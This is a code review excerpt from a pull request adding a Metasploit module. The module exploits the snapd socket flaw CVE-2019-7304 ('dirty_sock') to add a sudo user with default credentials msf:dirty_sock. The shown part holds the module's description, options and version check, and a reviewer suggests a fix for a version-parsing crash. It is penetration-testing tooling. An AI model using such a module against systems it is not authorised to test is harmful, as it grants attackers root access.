modules/post/linux/escalate/ubuntu_snapd_socket_privesc.rb

```diff
@@ -0,0 +1,163 @@
+
+  include Msf::Post::Linux::Priv
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ubuntu snapd Remote Socket Priv Esc',
+        'Description' => %q{
+          This module exploits a vulnerability in the snapd service < 2.34.2 on Ubuntu
+          14.04-18.04 and < 2.35.5 on Ubuntu 18.10.
+          The service incorrectly parses a unix socket file name
+          containing a UID parameter, and honors it as the UID for the process.
+
+          Exploitation can be complicated since the snap container is run from a sandbox
+          with limited read/write to some files on the filesystem.  The exploit creates
+          a new user with sudo privileges, by default msf:dirty_sock.  Upon successful
+          exploitation, the credentials may take a minute to become viable.
+
+          Exploitation will also cause snapd to perform an update on itself, so this is
+          a one shot exploit.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Chris Moberly' # original PoC, analysis
+        ],
+        'Platform' => ['linux'],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'EDB', '46362' ],
+          [ 'EDB', '46361' ],
+          [ 'URL', 'https://ubuntu.com/security/notices/USN-3887-1' ],
+          [ 'URL', 'https://github.com/initstring/dirty_sock' ],
+          [ 'URL', 'https://initblog.com/2019/dirty-sock/' ],
+          [ 'CVE', '2019-7304' ]
+        ],
+        'DisclosureDate' => '2019-02-13',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES], # CONFIG_CHANGES since it can cause snapd to update itself
+          'SideEffects' => [UNRELIABLE_SESSION], # since it can cause snapd to update itself
+          'AKA' => ['dirty_sock']
+        }
+      )
+    )
+    register_options([
+      OptPath.new('SQUASH', [true, 'The squashFS file of the snap container', ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2019-7304', 'squash.fs') ])
+    ])
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    ubuntu_release = cmd_exec('grep "VERSION_ID" /etc/os-release').split('=')[1].gsub('"', '')
+    ubuntu_release = Rex::Version.new(ubuntu_release)
+    unless command_exists?('snap')
+      return Msf::Exploit::CheckCode::Safe('Snap executable not found')
+    end
+
+    snapd_version = cmd_exec('snap version | grep snapd').split(' ')[1]
+    snapd_version = Rex::Version.new(snapd_version)
```

Comment:
On my Ubuntu 18.04x64 VM, the version is not sematically versioned, and it causes a crash:
`[-] Post failed: ArgumentError Malformed version number string 2.34.2+18.04`

This quick fix worked for me to parse the version properly:

```suggestion
    snapd_version = snapd_version.split('+')[0] if snapd_version.include?('+')
    snapd_version = Rex::Version.new(snapd_version)
```